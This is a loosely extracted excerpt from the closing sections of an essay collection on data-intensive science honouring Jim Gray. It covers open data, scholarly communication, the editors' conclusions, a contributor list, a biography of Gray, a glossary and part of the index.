protocols that connect computers and documents. Its the only way we can get the level of scale that we need. There is another nice benefit to this open approach. We have our worldviews and paradigms, our opinions and our arguments. Its our nature to think were right. But we might be wrong, and we are most definitely not completely right. Encoding our current worldviews in an open system would mean that those who come along later can build on top of us, just as we build on empiricism and theory and simulation, whereas encoding ourselves in a closed system would mean that what we build will have to be destroyed to be improved. An open data layer to the network would be a fine gift to the scientists who follow us into the next paradigma grace note of good design that will be remembered as a building block for the next evolution of the scientific method. References [1] T. S. Kuhn, The Structure of Scientific Revolutions. Chicago: University of Chicago Press, 1996. [2] G. Bell, T. Hey, and A. Szalay, Beyond the Data Deluge, Science, vol. 323, pp. 12971298, Mar. 6, 2009, doi: 10.1126/science.1170411. [3] J. Gray and A. Szalay, eScience - A Transformed Scientific Method, presentation to the Computer Science and Technology Board of the National Research Council, Mountain View, CA, Jan. 11, 2007. (Edited transcript in this volume.) [4] Joi Ito, keynote presentation at ETech, San Jose, CA, Mar. 11, 2009. [5] Broadband without Internet aint worth squat, by David Isenberg, keynote address delivered at Broadband Properties Summit, accessed on Apr. 30, 2009, at broadband-without-internet-ain-worth.html. [6] Wikipedia,, accessed on Apr. 30, 2009. [7] E. Moglen, Anarchism Triumphant: Free Software and the Death of Copyright, First Monday, vol. 4, no. 8, Aug. 1999,. [8] Science Commons Protocol on Open Access Data, publishing/open-access-data-protocol. 214 s c h o l a r ly co m m u n i c at i o n Clay Shirky, put it best. During his Lessons from Napster talk at the OReilly Peer-to-Peer Conference in 2001, he invited his audience to consider the infamous prediction of IBMsinsideirkystogether with the related observation that the dominant computing platform of our time is not Unix or Windows or 215 Mac OS, but rather the Web itselfled Tim OReilly to develop a vision for what he once called an Internet operating system [2], which subsequently evolved into a meme now known around the world as Web 2.0 [3]. Wrapped in that pithy (and now, unfortunately, overexploited) phrase are two important concepts. First, Web 2.0 acted as a reminder that, despite the dot-com crash of 2001, the Web wasand still ischanging the world in profound ways. Second, it incorporated a series of best-practice themes (or design patterns and business models) for maximizing and capturing this potential. These themes included: Network effects and architectures of participation The Long Tail Software as a service Peer-to-peer technologies Trust systems and emergent data Open APIs and mashups AJAX Tagging and folksonomies Data as the new Intel Inside 216 approaches that fully exploit the Web, at least in their professional lives. Blogging, for example, has not taken off in the same way that it has among technologists, political pundits, economists, or even mathematicians. Furthermore, collaborative environments such as OpenWetWare1 and Nature Network2 have yet to achieve anything like mainstream status among researchers. Physicists long ago learned to share their findings with one another using the arXiv preprint server,3 but only because it replicated habits that they had previously pursued by post and then e-mail. Life and Earth scientists, in contrast, have been slower to adopt similar services, such as Nature Precedingsand arising from this gradual but inevitable embrace of information technologywe,5 now contains a great deal of high-quality scientific information, much of it provided by scientists themselves. This includes rich, well-organized, and interlinked information about many thousands of chemical compounds. Meanwhile, more specialized resources from both public and private initiativesnotably PubChem6 and ChemSpider7are growing in content, contributions, and usage 1 217 despite the fact that chemistry has historically been a rather proprietary domain. (Or perhaps in part because of it, but that is a different essay.) And speaking of proprietary domains, consider drug discovery. InnoCentive,8 a company spun off from Eli Lilly, has blazed a trail with a model of open, Webenabled, onedimensional Googles 8 w ww.innocentive.com 218 domainsthe textual, semi-structured world of journals and the numeric, highly structured world of databasestoindeed, all of human knowledge worldsand a lasting testament to our species and our age. References [1] C. Shirky, Lessons from Napster, talk delivered at the OReilly Peer-to-Peer Conference, Feb. 15, 2001,. [2] T. OReilly, Inventing the Future, 2002, future.html. 219 [3] T. OReilly, What Is Web 2.0, 2005, what-is-web-20.html. [4] T. Berners-Lee, Weaving the Web. San Francisco: HarperOne, 1999. [5] International Consortium Announces the 1000 Genomes Project,. [6] J. C. Venter et al., Environmental genome shotgun sequencing of the Sargasso Sea, Science, vol. 304, pp. 6674, 2004, doi:10.1126/science.1093857. [7] C. Anderson, The End of Theory: The Data Deluge Makes the Scientific Method Obsolete, Wired, June 2008,. [8] S. Brin and L. Page, The Anatomy of a Large-Scale Hypertextual Web Search Engine, 1998,. [9] [10] [11] [12] E. O. Wilson, Consilience: The Unity of Knowledge. New York: Knopf, 1998. 220 223 client-plus-cloud computing, natural user interfaces, and quantum computing that promises to revolutionize scientific discovery. Data-intensive science promises breakthroughs across a broad spectrum. As the Earth becomes increasingly instrumented with low-cost, high-bandwidth sensors, we will gain a better understanding of our environment via a virtual, distributed whole-Earth macroscope. Similarly, the night sky is being brought closer with high-bandwidth, widely available data-visualization systems. This virtuous circle of computing technology and data access will help educate the public about our planet and the Universe at largemaking us all participants in the experience of science and raising awareness of its immense benefit to everyone. In healthcare, a shift to data-driven medicine will have an equally transformative impact. The ability to compute genomics and proteomics will become feasible on a personal scale, fundamentally changing how medicine is practiced. Medical data will be readily available in real timetracked, benchmarked, and analyzed against our unique characteristics, ensuring that treatments are as personal as we are individual. Massive-scale data analytics will enable real-time tracking of disease and targeted responses to potential pandemics. Our virtual macroscope can now be used on ourselves, as well as on our planet. And all of these advances will help medicine scale to meet the needs of the more than 4 billion people who today lack even basic care. As computing becomes exponentially more powerful, it will also enable more natural interactions with scientists. Systems that are able to understand and have far greater contextual awareness will provide a level of proactive assistance that was previously available only from human helpers. For scientists, this will mean deeper scientific insight, richer discovery, and faster breakthroughs. Another major advance is the emergence of megascale services that are hosted in the cloud and that operate in conjunction with client computers of every kind. Such an infrastructure will enable wholly new data delivery systems for scientistsoffering them new ways to visualize, analyze, and interact with their data, which will in turn enable easier collaboration and communication with others. This enhanced computing infrastructure will make possible the truly global digital library, where the entire lifecycle of academic researchfrom inception to publicationwill take place in an electronic environment and be openly available to all. During the development of scientific ideas and subsequent publishing, scientists will be able to interact virtually with one anothersharing data sources, workflows, and research. Readers, in turn, will be able to navigate the text of a 224 publication and easily view related presentations, supporting images, video, audio, data, and analyticsall online. Scientific publication will become a 24/7, worldwide, real-time, interactive experience. I am encouraged to see scientists and computer scientists working together to address the great challenges of our age. Their combined efforts will profoundly and positively affect our future. 225 The well-formed.eigenfactor project visualizes information flow in science. It came about as a collaboration between the Eigenfactor project (data analysis) and Moritz Stefaner (visualization). This diagram shows the citation links of the journal Nature. More information and visualizations can be found at. 226 Conclusions y the mid-1990s, jim gray had recognized that the next big data challenges for database technology would come from science and not from commerce. He also identified the technical challenges that such data-intensive science would pose for scientists and the key role that IT and computer science could play in enabling future scientific discoveries. The term eScience was coined in the year 2000 by John Taylor, when he was director general of the UK Research Councils. Taylor had recognized the increasingly important role that IT must play in the collaborative, multidisciplinary, and data-intensive scientific research of the 21st century and used the term eScience to encompass the collection of tools and technologies needed to support such research. In recognition of the UK eScience initiative, Jim Gray called his research group at Microsoft Research the eScience Group, and he set about working with scientists to understand their problems and learn what tools they needed. In his talk to the Computer Science and Telecommunications Board of the U.S. National Research Council in 2007, Jim expanded on his vision of data-intensive science and enumerated seven key areas for action by the funding agencies: 1. Foster both the development of software tools and support for these tools. 2. Invest in tools at all levels of the funding pyramid. 3. Foster the development of generic Laboratory Information Management Systems (LIMS). 4. Foster research into scientific data management, data analysis, data visualization, and new algorithms and tools. 227 5. Establish digital libraries that support other sciences in the same way the National Library of Medicine supports the bio-sciences. 6. Foster the development of new document authoring tools and publication models. 7. Foster the development of digital data libraries that contain scientific data (not just the metadata) and support integration with published literature. We believe that these challenges to the funding agencies are just as important today. This is why we have introduced this collection of essays, along with a version of Jims talk to the NRC-CSTB constructed from the transcript of his lecture and his presentation slides. It is also educational to see the continuing momentum and progress of the eScience community since the report Towards 2020 Science published by our colleagues at Microsoft Research, Cambridge, UK.1 That was based on a workshop in July 2005, attended by some of the authors in this new book, and subsequently inspired Natures 2020 Computing special issue in March 2006.2 At the heart of scientific computing in this age of the Fourth Paradigm is a need for scientists and computer scientists to work collaborativelynot in a superior/subordinate relationship, but as equalswith both communities fueling, enabling, and enriching our ability to make discoveries that can bring about productive and positive changes in our world. In this book, we have highlighted healthcare and the environment, just two areas in which humanity faces some of its biggest challenges. To make significant progress, the research community must be supported by an adequate cyberinfrastructure comprising not only the hardware of computing resources, datacenters, and high-speed networks but also software tools and middleware. Jim also envisaged the emergence of a global digital research library containing both the research literature and the research data. Not only are we seeing the maturing of data-intensive science, but we are also in the midst of a revolution in scholarly communication. This is driven not only by technologies such as the Internet, Web 2.0, and semantic annotations but also by the worldwide movement toward open access and open science. This book is really a labor of love. It started with Jims desire to enable scientific research through the technologies of computer sciencecutting across the disciplines highlighted herein and beyond. We see this book as a continuation of Jims work with the science community. We deliberately asked our scientific contributors 1 2 Nature, vol. 440, no. 7083, Mar. 23, 2006, pp. 383580. 228 CONCLUSIONS to move out of their professional comfort zones and share their visions for the future of their research fields on a 5-to-10-year horizon. We asked them to write their contributions not only in essay form, which is often a greater challenge than writing a purely technical research article, but often in collaboration with a computer scientist. We are grateful to all of our contributors for rising to this challenge, and we hope that they (and you!) will be pleased with the result. Several decades ago, science was very discipline-centric. Today, as evidenced by the articles in this book, significant advances are being made as a result of multidisciplinary collaborationand will continue to be made into the future. The essays in this book present a current snapshot of some of the leading thinking about the exciting partnership between science and computer sciencea data revolution which makes this information timely and potentially fleeting. However, it is our fervent hope and belief that the underlying message presented by the totality of these articles will be durable for many years. Finally, we offer this book as a call to action for the entire research community, governments, funding agencies, and the public. We urge collaboration toward a common goal of a better life for all humanity. We find ourselves in a phase in which we need to use our scientific understanding to achieve specific goals for the sake of humanitys survival. It is clear that to achieve this aim, we very much need experts with deep scientific knowledge to work closely with those who have deep experience with technology. This situation is somewhat analogous to the 1940s, when U.S. and European physicists answered an urgent call from governments to collaborate on the Manhattan Project. Today, scientists must collaborate globally to solve the major environmental and health problems facing humanity in a race that is perhaps even more urgent. And ironically, the nuclear physics developed in the Manhattan Project is likely to provide part of the answer in supplying the world with zero-carbon energy. 229 ne x t ste ps we hope this book will inspire you to take action as well as embark on further study. We are walking the talk ourselves at Microsoft Research. For example, we have reformulated our academic partnership organization, External Research, to focus on the themes presented in this book. These themes incorporate active research in dynamic fields, so it is hard to track and predict the future evolution of the ideas presented in this book. But here are some suggested ways to remain engaged and to join in the dialogue: If youre a scientist, talk to a computer scientist about your challenges, and vice versa. If youre a student, take classes in both science and computer science. If youre a teacher, mentor, or parent, encourage those in your care toward interdisciplinary study in addition to giving them the option to specialize. Engage with the editors and authors of this book through the normal scholarly channels. Keep up to date with our eScience research collaborations through our Web site:. Be active in the eScience communityat the Fourth Paradigm Web site below, we suggest helpful resources. 230 NEXT STEPS AC K N OWL E DG M E N T S to all the contributors to this book for sharing their visions within the Fourth Paradigm. We also thank our families and colleagues for their support during the intensive editorial process. The exceptional efforts of the project team, including Ina Chang, Marian Wachter, Celeste Ericsson, and Dean Katz, are also gratefully acknowledged. And, of course, we thank Jim Gray, for inspiring us. the editors express their heartfelt thanks CONTRIBUTORS Mark R. Abbott Oregon State University Dennis D. Baldocchi University of California, Berkeley Roger S. Barga Microsoft Research Mathias Bavay WSL Institute for Snow and Avalanche Research SLF Gordon Bell Microsoft Research Chris Bishop Microsoft Research Jos A. Blakeley Microsoft Iain Buchan University of Manchester Graham Cameron EMBL-European Bioinformatics Institute Luca Cardelli Microsoft Research Michael F. Cohen Microsoft Research Nicholas Dawes WSL Institute for Snow and Avalanche Research SLF Del DeHart Robertson Research Institute John R. Delaney University of Washington David De Roure University of Southampton John Dickason Private practice Lee Dirks Microsoft Research Jeff Dozier University of California, Santa Barbara Dan Fay Microsoft Research Craig Feied Microsoft Anne Fitzgerald Queensland University of Technology Brian Fitzgerald Queensland University of Technology Peter Fox Rensselaer Polytechnic Institute William B. Gail Microsoft Dennis Gannon Microsoft Research Michael Gillam Microsoft Paul Ginsparg Cornell University Carole Goble University of Manchester Alyssa A. Goodman Harvard University Daron Green Microsoft Research 231 Jonathan Handler Microsoft Timo Hannay Nature Publishing Group Charles Hansen University of Utah David Heckerman Microsoft Research James Hendler Rensselaer Polytechnic Institute Eric Horvitz Microsoft Research James R. Hunt University of California, Berkeley, and the Berkeley Water Center Chris R. Johnson University of Utah William Kristan University of California, San Diego Carl Lagoze Cornell University James Larus Microsoft Research Michael Lehning WSL Institute for Snow and Avalanche Research SLF Jeff W. Lichtman Harvard University Clifford Lynch Coalition for Networked Information Simon Mercer Microsoft Research Eliza Moody Microsoft Craig Mundie Microsoft Suman Nath Microsoft Research Kylie Pappalardo Queensland University of Technology Savas Parastatidis Microsoft Marc Parlange cole Polytechnique Fdrale de Lausanne Valerio Pascucci University of Utah Hanspeter Pfister Harvard University Catherine Plaisant University of Maryland Corrado Priami Microsoft Research - University of Trento Centre for Computational and Systems Biology and University of Trento Dan Reed Microsoft Research R. Clay Reid Harvard University Joel Robertson Robertson Research Institute Ben Shneiderman University of Maryland Claudio T. Silva University of Utah Mark Smith University of Maryland Christopher Southan EMBL-European Bioinformatics Institute Alexander S. Szalay The Johns Hopkins University Kristin Tolle Microsoft Research Herbert Van de Sompel Los Alamos National Laboratory Catharine van Ingen Microsoft Research John Wilbanks Creative Commons John Winn Microsoft Research Curtis G. Wong Microsoft Research Feng Zhao Microsoft Research 232 ACKNOWLEDGMENTS Dr. James Nicholas Jim Gray (born 1944, missing at sea on January 28, 2007) was esteemed for his groundbreaking work as a programmer, database expert, engineer, and researcher. He earned his Ph.D. from the University of California, Berkeley, in 1969becoming the first person to earn a doctorate in computer science at that institution. He worked at several major high-tech companies, including Bell Labs, IBM Research, Tandem, Digital Equipment Corporation, and finally Microsoft Research in Silicon Valley. Jim joined Microsoft in 1995 as a Senior Researcher, ultimately becoming a Technical Fellow and managing the Bay Area Research Center (BARC). His primary research interests were large databases and transaction processing systems. He had a longstanding interest in scalable computingbuilding super-servers and work group systems from commodity software and hardware. His work after 2002 focused on eScience: applying computers to solve data-intensive scientific problems. This culminated in his vision (with Alex Szalay) of a fourth paradigm of science, a logical progression of earlier, historical phases dominated by experimentation, theory, and simulation. Jim pioneered database technology and was among the first to develop the technology used in computerized transactions. His work helped develop e-commerce, online ticketing, automated teller machines, and deep databases that enable the success of todays high-quality modern Internet search engines. In 1998, he received the ACM A.M. Turing Award, the most prestigious honor in computer science, for seminal contributions to database and transaction processuring award winner and american computer scientist 235 ing research and technical leadership in system implementation. He was appointed an IEEE Fellow in 1982 and also received the IEEE Charles Babbage Award. His later work in database technology has been used by oceanographers, geologists, and astronomers. Among his accomplishments at Microsoft were the TerraServer Web site in collaboration with the U.S. Geological Survey, which paved the way for modern Internet mapping services, and his work on the Sloan Digital Sky Survey in conjunction with the Astrophysical Research Consortium (ARC) and others. Microsofts WorldWide Telescope software, based on the latter, is dedicated to Jim. Jim always reached out in two waystechnically and personally, says David Vaskevitch, Microsofts senior corporate vice president and chief technical officer in the Platform Technology & Strategy division. Technically, he was always there first, pointing out how different the future would be than the present. Many people in our industry, including me, are deeply indebted to Jim for his intellect, his vision, and his unselfish willingness to be a teacher and a mentor, says Mike Olson, vice president of Embedded Technologies at Oracle Corporation. Adds Shankar Sastry, dean of the College of Engineering at UC Berkeley, Jim was a true visionary and leader in this field. Jims impact is measured not just in his technical accomplishments, but also in the numbers of people around the world whose work he inspired, says Rick Rashid, senior corporate vice president at Microsoft Research. Microsoft Chairman Bill Gates sums up Jims legacy in this way: The impact of his thinking is continuing to get people to think in a new way about how data and software are redefining what it means to do science. Such sentiments are frequently heard from the myriad researchers, friends, and colleagues who interacted with Jim over the years, irrespective of their own prominence and reputation. Known, loved, and respected by so many, Jim Gray needs no introduction, so instead we dedicate this book to him and the amazing work that continues in his absence. The Editors 236 G lossary POWERS OF TEN exapetateragigamegakilohectodecadecicentimillimicronanopico- E P T G M k h da d c m n p 1,000,000,000,000,000,000 1,000,000,000,000,000 1,000,000,000,000 1,000,000,000 1,000,000 1,000 100 10 1 0.1 0.01 0.001 0.000001 0.000000001 0.000000000001 1018 10 10 10 10 10 10 10 10 10 10 15 12 9 6 quintillion quadrillion trillion billion million thousand hundred ten one tenth hundredth thousandth millionth billionth trillionth 3 2 1 0 1 2 Common Abbreviations Australian Square Kilometre Array Pathfinder Automatic Tape-Collecting Lathe Ultramicrotome autonomous underwater vehicle Business Process Execution Language charge-coupled device Center for Environmental Visualization Citation, Location, And Deposition in Discipline and Institutional Repositories Chemistry Markup Language central processing unit Computer Science and Telecommunications Board directed acyclic graph DNA Data Bank of Japan 237 DOE EBI ECHO EHR EMBL EMBL-Bank EOSDIS ET FDA FFT FLUXNET fMRI FTP GCMD GEOSS GOLD GPU GPGPU GUI H1N1 INSDC IT KEGG KLAS LEAD LHC LIDAR LLNL LONI MESUR MMI NASA NHS NIH NLM Department of Energy European Bioinformatics Institute Earth Observing System Clearinghouse electronic health record European Molecular Biology Laboratory European Molecular Biology Laboratory Nucleotide Sequence Database Earth Observing System Data and Information System evapotranspiration Food and Drug Administration Fast Fourier Transform A global network of micrometeorological tower sites functional magnetic resonance imaging File Transfer Protocol NASAs Global Change Master Directory Global Earth Observation System of Systems Genomes OnLine Database graphics processing unit general-purpose graphics processing unit graphical user interface swine flu International Nucleotide Sequence Database Collaboration information technology Kyoto Encyclopedia of Genes and Genomes Keystone Library Automation System Linked Environments for Atmospheric Discovery Large Hadron Collider Light Detection and Ranging Lawrence Livermore National Laboratory Laboratory of Neuro Imaging Metrics from Scholarly Usage of Resources Marine Metadata Interoperability National Aeronautics and Space Administration National Health Service (UK) National Institutes of Health National Library of Medicine 238 GLOSSARY NLM DTD NOAA NRC NSF OAI OAI-ORE OAI-PMH OBO OO OOI OWL Pan-STARRS PHR PubMed RDF RDFS ROV RSS SCEC SOA SWORD TCP/IP TM UNICEF UniProt URI USGS VT 100 WATERS Network WHO XML National Library of Medicine Document Type Definition National Oceanic and Atmospheric Administration National Research Council National Science Foundation Open Archives Initiative Open Archives Initiative Object Reuse and Exchange protocol Open Archives Initiative Protocol for Metadata Harvesting Open Biomedical Ontologies object-oriented Ocean Observatories Initiative Web Ontology Language Panoramic Survey Telescope And Rapid Response System personal health record Free National Library of Medicine online database of biomedical journal articles Resource Description Framework RDF Schema remotely operated vehicle Really Simple Syndication Southern California Earthquake Center service-oriented architecture Simple Web-service Offering Repository Deposit Transmission Control Protocol/Internet Protocol (the Internet Protocol Suite) transactional memory United Nations Childrens Fund Universal Protein Resource Uniform Resource Identifier U.S. Geological Survey A Digital Equipment Corporation (DEC) video terminal WATer and Environmental Research Systems Network World Health Organization eXtensible Markup Language 239 inde x A abbreviations, list of common, 237239 Accredited Social Health Activists (ASHAs), 71 ACM (Association for Computing Machinery), xxviii alpine natural hazards, forecasting, 4849 amateurs. See citizen science Amazon.com, 166 Anderson, Chris, 218 Antarctic Treaty, 203, 204 Apache Web server, 212 application-based science vs. basic science, 1418. See also science of environmental applications archiving. See also curation; digital data libraries as core function in scholarly communication, 195 data vs. literature, xii, xxviixxviii, xxx of environmental data, 48 European Nucleotide Archive, 118119 Gordon Bells view, xii and history of science, 178180 Jim Grays view, xxviixxviii, xxx NSF infrastructure efforts, xii, xv, xx, xxx, 198 of ocean science data, 31 Open Archives Initiative, 194, 198 role in Laboratory Information Management Systems, xxii role of overlay journals, xxviixxviii Armbrust, Ginger, 36 articles. See scientific papers artificial intelligence (AI), 70, 148, 169170, 189 arXiv, xxviii, 185, 217 ASKAP (Australian Square Kilometre Array Pathfinder), xiii, 147 Aster Data, 7 astronomy, xx, 3944 atmospheric science, observations motivating next-generation environmental science, 4547 Atom format, 197, 198 Australia, need for national data sharing policy framework, 205207 Australian National Data Service (ANDS), xivxv Australian Square Kilometre Array Pathfinder (ASKAP), xiii, 147 Automatic Tape-Collecting Lathe Ultramicrotome (ATLUM), 79, 80 avatars, in healthcare, 9697 Axial Seamount, 32 Azure platform, 133 B basic science vs. science based on applications, 1418 Beowulf clusters, xx, xxiv, 126 Berlin Declaration on Open Access to Knowledge in the Sciences and Humanities, 203 Bermuda Principles, 203 Berners-Lee, Tim, 171, 188189 BGI Shenzhen, 120121 Bing, xxvi BioCatalogue, 143 bioinformatics, xix. See also EBI (European Bioinformatics Institute) biological sciences. See Earth and environmental science; ecology; life sciences BioMart, 138 biometrics, 71 BioMoby, 167 BlenX language, 101 Blue Gene/L supercomputer, 155 BOINC (Berkeley Open Infrastructure for Network Computing), 24 BPEL (Business Process Execution Language), 140 Brahe, Tycho, xi brain, 7582. See also nervous system brainbow, 78 Bush, Vannevar, 171 bX scholarly recommender service, 196 C cabled ocean observatories, 3235 cameras, digital, 18, 43 carbon markets, 14, 15, 16 cell phones Earth and environmental science applications, 1718 as healthcare delivery vehicle in developing countries, 6869 241 CERN, xiii, 189, 216 CEV (Center for Environmental Visualization), 29, 33, 34, 36 charge-coupled devices (CCDs), 40 Chastain, Erick, 86, 87 chemistry as interconnected Web-enabled science, 217218 oreChem project, 170171 Chemistry Markup Language (CML), 170 ChemSpider, 217 Chu, Steven, 14 citation data in scholarly communication, 25, 151, 178, 186, 187, 195196, 226. See also provenance Citation Typing Ontology effort, 196 citizen science. See also crowdsourcing as contributor to localized Earth observation, 18 and gathering of astronomical data, 4043 groups as resources for ecological data, 23, 24 CLADDIER project, 196 climate change and data-intensive computing, 112116 as driver of cross-disciplinary research, 2526, 44 and ecological data analysis, 2126 role of environmental scientists, 4551 and science of environmental applications, 1314 and water system management, 1415 cloud computing advantages, 9 in astronomy, 40, 41 data as archival media, xii and ecological synthesis studies, 2425 exploiting parallelism, 132133 impact on how scientific research is undertaken and disseminated, 26, 166 linking to SQL Server Analysis Services data cube, 25 in ocean research, 31 for patient medical data, 6263 clusters in biology, 8789, 95 of computers, xx, xxiii, xxiv, 6, 126 CMT (Conference Management Tool), xxviii, xxix collaboration. See also data sharing in ecological synthesis studies, 2126 between environmental scientists and computer scientists, 4551 exploring visual and analytical challenges held in common between disciplines, 44 as necessity, 218, 228 between ocean scientists and computer scientists, 35 online opportunities for astronomical and educational communities, 42 role of Internet, 214, 216, 217 role of workflows in data-intensive science, 143 commodity computing, 23, 43, 114, 132, 235 communication. See scholarly communication community avatars, 9697 Community Collaborative Rain, Hail and Snow Network, 23 computational microscopes, 84, 8789 computational modeling, 56, 93 computational power, 43. See also parallel computing computational thinking, xx, 92 computer scientists, need for collaboration and peer relationships with domain scientists, 78, 35, 4551, 150, 228. See also dataintensive science; scientific computing Concept Web Alliance, 195 Condor software, xxiv Conference Management Tool (CMT), xxviii, xxix connectome, 77 Consortium for Ocean Leadership, 32 controlled vocabularies, xxix, 187 copyright, 182, 211, 212, 213 COUNTER project, 196 CPU. See multicore processors crawlers, 8, 9 Creative Commons, 212 crowdsourcing. See also citizen science in astronomical galaxy studies, 4041 in post-market studies of new drugs, 61 curation, xiiixv, xvii, xxvii, 180, 181. See also archiving; provenance 242 INDEX cyberinfrastructure. See also information technology (IT) infrastructure cabled ocean observatory example, 3235 impact on ecological science, 2526 Jim Grays view, xx, xxi for knowledge-driven research, 165172 NSF efforts, xx, 198 scholarly communication requirements for, 198 as sociotechnical issue, 198199 Web-based, 197, 198 D Da Gama, Vasco, 57 DAGMan workflow system, 140 DAGs (directed acyclic graphs), 133 data. See also data-intensive science; databases; knowledge access and sharing policies within and among nations, 201208 analysis, xiv, xvii, xxiv capture, xiiixiv, xvii curation, xii, xiiixv, xvii, xxvii exponential increases in volume, 9, 3940, 77, 112, 117120, 131, 218 filtering, 6, 116, 162, 182, 194 as fourth network layer, 211, 213 interconnectedness, 219 need for systems that go from collecting to publishing on Web, xxiixxiii, xxix spatiotemporal, 84 data aggregation, 6263. See also cloud computing data clouds. See cloud computing data crawling, 8, 9 data deluge, as network concept, 210215. See also data-intensive science data exploration, 154157 data-intensive science. See also fourth paradigm database-centric computing, 511 description, xxx, 116, 224225 funding issues, xiii, xx, xxi, xxiv, xxv, 151, 198, 203, 206, 227228 Gordon Bells view, xixv impact of workflow tools, 137145 impact on scientific record, 177183 Jim Grays informal rules for approaching, 56, 7 need for semantic-based methodologies, 147153, 186189, 190 relationship to paradigm shift, 210 role of text, 185191 three basic activities, xiii two ways to engage scientific record, 182183 visualization for, 153163 data mining, 48, 121, 122, 123, 141, 190. See also text, tools for mining data parallelism, 127128. See also parallel computing data scientists, defined, xii. See also dataintensive science; scientific computing data sharing, 65, 6971, 128, 202204. See also collaboration data streaming, 84, 133, 154 data visualization. See visualization databases applying core functions of scholarly communication to datasets, 195 data-centric science overview, 511 Jim Grays definition, xxiii keeping scientific data and documents together, xivxv, xxviiixxix, 181, 182, 186188, 190, 219 limitations caused by dataset size, 57 scaling, 89, 6667 datasets. See databases dbMotion, 62 developing countries, healthcare delivery in, 6573 digital cameras, 18, 43 Digital Curation Centre, xv digital data libraries. See also archiving; curation description, xxx, 224225 Digital Libraries Initiative, 198 Jim Grays view, xxx linking documents to data, xxviiixxix, 181, 182, 186188, 190, 219, 224226 NCAR as example, xiv role of data scientists, xii role of overlay journals, xxviixxviii Directive on the Re-use of Public Sector Information, 205 243 DISC (Data-Intensive Super Computing), 166 DNA Data Bank of Japan (DDBJ), 117 documents. See scientific papers domain scientists exploring visual and analytical challenges held in common between disciplines, 44 interoperable exchange of information, 171 need for collaboration and peer relationships with computer scientists, 78, 35, 4551, 150, 228 need for generic software tools, xx, xxi, xxivxxv and Wolfram|Alpha service, 167 drugs crowdsourcing quality assurance, 61 Web-enabled innovation, 218 Dryad, 133, 166, 171 DryadLINQ. See LINQ (Language Integrated Query) dye advection, 161 E Earth and environmental science. See also ocean science cabled ocean observatories, 3235 collaboration among domain scientists and computer scientists, 4551 developing into science of environmental applications, 1319 impact of data flood on ecological science, 2126 next-generation sensor networks, 4551 role of NCAR as digital data library, xiv Web services registries, 150 Earth Observing System Clearinghouse (ECHO), 150 Earth Observing System Data and Information System (EOSDIS), 112, 113, 115 EBI (European Bioinformatics Institute), 118123 ECHO (Earth Observing System Clearinghouse), 150 ecology. See also Earth and environmental science and cloud computing, 2425 computational vs. eco-informatics, xix defined, 21 large synthesis studies, 2126 semantic technologies in, 148, 189, 190 watershed example, 2223 Eigenfactor project, 226 electro-optic cables, role in ocean research, 31, 32 electron microscopy, 7779 electronic health records (EHRs), 9192, 93. See also medical records Eli Lilly, 218 ELIXIR project, 122123 EMBL (European Molecular Biology Laboratory), 118, 186 EMBL-Bank (European Molecular Biology Laboratory Nucleotide Sequence Database), 117119 Ensembl Web site, 120 Entrez search engine, xxixxxx, 138 environmental science. See Earth and environmental science; ecology; science of environmental applications EOSDIS (Earth Observing System Data and Information System), 112, 113, 115 eResearch defined, 165, 178 policy frameworks for international collaboration, 201208 eScience, defined, xviii, 147, 227, 235. See also data-intensive science ET (evapotranspiration), 15, 22, 23, 25 European Bioinformatics Institute (EBI), 118123 European Nucleotide Archive, 118119 European Union, 205 Excel spreadsheets, xviii, xxi, xxiv experimental science. See scientific computing expert scientists. See domain scientists F face recognition, 43, 71 FASTQ format, 120 FDA. See Food and Drug Administration (FDA) Fernicola, Pablo, 188 fiber optics. See cabled ocean observatories Finney, Kim, 204 first paradigm, xviii, 96, 223 floating-point computations, 180 flood control, 1415 244 INDEX Flow Charts scheme, 160 flow visualization, 159161 Fluxnet, 25 fMRI (functional magnetic resonance imaging), 76 Food and Drug Administration (FDA), 61 forecasting, very short-term, 4849 four-color theorem, 180 fourth paradigm. See also data-intensive science defined, 165, 166 healthcare information example, 96 impact on scientific record, 177183 Jim Grays view, xiii, xiv, xix, xxx, 165, 177, 210, 223, 227 ocean science example, 3031 relationship to fourth network layer, 211 Freebase service, 167 FreeBSD Unix, xxiv functional programming languages, 128129 funding, xiii, xx, xxi, xxiv, xxv, 151, 198, 203, 206, 227228 G Galaxy Zoo tool, 4041, 42 GenBank, xxix, xxx, 117, 190 gene sequencing, xiii, 7, 36, 137, 186, 203 genes, using Taverna workflow to search for, 138, 139 genomes, 92, 95, 102, 120121 Genomes Online Database (GOLD), 120 GEO (Group on Earth Observations), 202 geology. See Juan de Fuca Plate GEOSS (Global Earth Observation System of Systems) as clearinghouse for Web service registries, 150 data sharing principles, 202203 German Intercity Express (ICE) trains, 160 Gilbert, Wally, 190 Global Change Master Directory (GCMD), 150 GOLD (Genomes Online Database), 120 Google MapReduce tool, 133, 166 PageRank tool, 116, 218 search engine, xxvi, 216 Google Health, 62 Google Sky, 42 GPGPUs (general-purpose graphics processing units), 127, 134 GPUFLIC algorithm, 160, 161 graphics processing units (GPUs) in flow visualization research, 159160 general-purpose, 127, 134 Gray, Jim background, 235236 and fourth paradigm, xiii, xiv, xix, xxx, 165, 177, 210, 223, 227 Grays Laws, 510 impact on cabled ocean observatory, 35, 37 informal rules for approaching data-intensive science, 56, 78 January 11, 2007, speech to Computer Science and Telecommunications Board, xiii, xviixxxi, 227228 photos, xvi, 234 role in arXiv, 185 and scholarly communication, xxxxvii, 198 suggests areas for action by funding agencies, 227228 Group on Earth Observations (GEO), 202 H H1N1 pandemic, 117 Hadoop, 133, 166, 171 Hales, Thomas, 180 HDF (Hierarchical Data Format), xxiii health avatars, 9697 healthcare. See also medical knowledge; medical records data-intensive, unified modeling approach, 9197 delivery in developing countries, 6573 information paradigms, 96 semantic technologies in, 148 Healthcare Singularity, 59, 6163 HealthVault, 62, 63 HEWs (health extension workers), 68, 71 Hippocrates, 96 Hirudo (European medicinal leech), 8687, 8889 Hubble Space Telescope, 41 I IEEE (Institute of Electrical and Electronics Engineers), xxviii 245 IEEE floating-point standard, 180 imaging techniques. See also visualization in developing computational microscope for neurobiologists, 84, 85, 8688 role in ocean research, 3132 for tracking neuronal circuits in the brain, 7582 immunization, in developing countries, 65 information overload, in medicine, 58, 9293. See also data, exponential increases in volume information technology (IT) infrastructure. See also cyberinfrastructure; data-intensive science; scientific computing and eScience, xviii, 227 impact on science community, 114115 new tools for data-intensive era, 115116 present day, 113114 recent history, 112 InnoCentive, 218 INSDC (International Nucleotide Sequence Database Collaboration), 117 INSPIRE Directive, 205 intellectual property, xxvi. See also copyright interdisciplinary research, 2526, 44, 170 International Human Genome Sequencing Consortium, 203 